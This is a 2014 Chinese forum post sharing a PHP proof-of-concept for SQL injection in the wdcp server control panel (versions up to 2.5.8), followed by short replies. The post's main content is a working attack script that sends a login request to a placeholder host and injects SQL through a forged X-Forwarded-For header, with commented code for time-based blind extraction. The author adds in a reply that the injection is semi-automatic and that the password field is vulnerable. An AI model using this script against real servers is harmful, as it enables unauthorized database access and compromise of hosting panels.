已掉线,重新登录

首页 > 绿虎论坛 > 历史版块 > 编程 > PHP > 源码

标题: wdcp<=2.5.8注入漏洞

作者: @Ta

时间: 2014-05-04

点击: 3425

<?php
$id=$_GET["id"];
//$id2=$_GET["id2"];
$post_data = 'username=admin&passwd=bbbbbb\&Submit_login=aaaassss';
$url=' http://xxx:8080/';
$starttime = time();
$ch = curl_init();
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL,$url);
//curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X- FORWARDED-FOR: ,('.$id.'),char(65),1) #'));
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
ob_start();
curl_exec($ch);
$result = ob_get_contents() ;
ob_end_clean();
$endtime = time();
/*
if($endtime-$starttime>=3){
exit($id." is ".chr($id2));
}*/
echo $result;
?>

[隐藏样式|查看源码]


『回复列表(7|隐藏机器人聊天)』

1. @funch
(/@Ta/2014-05-04 15:05//)

2. 参数都对吗?
(/@Ta/2014-05-04 15:20//)

3. 又有漏洞了啊
(/@Ta/2014-05-04 15:29//)

5. 麻痹用英语写注视
(/@Ta/2014-05-04 17:15//)

6. @tltl1998,根本就没有注释好不好?那是代码,不是说明
(/@Ta/2014-05-04 17:34//)

7. @tltl1998,有注释?
(/@Ta/2014-05-04 17:34//)

8. @齐子 @无名游客 语句需要自己构造,半自动,主要是passwd字段存在注入风险。
(/@Ta/2014-05-04 21:59//)

回复需要登录

9月7日 03:47 星期天

本站由hu60wap6驱动

备案号: 京ICP备18041936号-1